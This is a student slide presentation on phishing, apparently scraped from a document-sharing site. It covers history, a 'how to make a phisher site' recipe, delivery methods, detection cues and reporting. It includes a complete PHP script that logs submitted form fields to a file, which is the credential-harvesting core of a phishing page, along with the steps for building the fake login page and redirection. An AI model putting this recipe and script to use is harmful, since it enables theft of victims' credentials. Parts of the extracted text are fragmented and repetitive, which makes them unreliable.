Phishing: Guided by M.Chandu Jagan Shekar BY Asst Professor P.Srikanth Dept of IT IT (07U41A1240)

You might also like

Download as pptx, pdf, or txt
Download as pptx, pdf, or txt
You are on page 1of 20

Phishing

Guided By
M.Chandu Jagan Shekar BY
Asst Professor P.Srikanth
Dept of IT IT(07U41A1240)
Contents
Introduction
How to make a phisher site?
How to use a phisher site?
How the phishing happens/done?
Detecting phishing sites?
Preventing from phisher
Reporting phishing
Introduction
History:
Introduced in 1987, and the first use of the term
"phishing" was made in 1996.

Definition:
Process of attempting to acquire sensitive
information such as usernames, passwords and credit
card details.
How to make a phisher site?
Making a Phishing site contains 3 steps:

Creating the login page.

Redirecting.

Embedding Script(PHP).
Creating a login page:
Redirecting
Original site redirection Fake site redirection
Embedding Script(PHP)

<?phpheader("");
   $handle = fopen("name.txt", "a");
   foreach($_GET as $variable => $value)
{
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
  }
  fwrite($handle, "\r\n");
  fclose($handle);
  exit;?>
How the phishing happens/done?
Instant messaging
While chatting with someone by using the
Messenger’s like yahoo,Gmail.etc.
Links to
fake
page of
corresp
onding
site
How The Phishing happens/done?
http://ww
Fake E-mails w.trusted-
bankin/lo
gin.html
Structure of phishing

1 7
5
6
2

3
4
Detecting & Preventing Phishing Sites

HTTP – HTTPS

Digital Signatures

Wrong password (redirecting)

Email notice
• HTTP-HTTPS
• HTTP-HTTPS
• Digital signatures…
• Wrong Password (Redirecting)
• Email notice

• Wrong Password (Redirecting)

Not the real


address bar
Reporting Phishing
Queries plzzzzzz

You might also like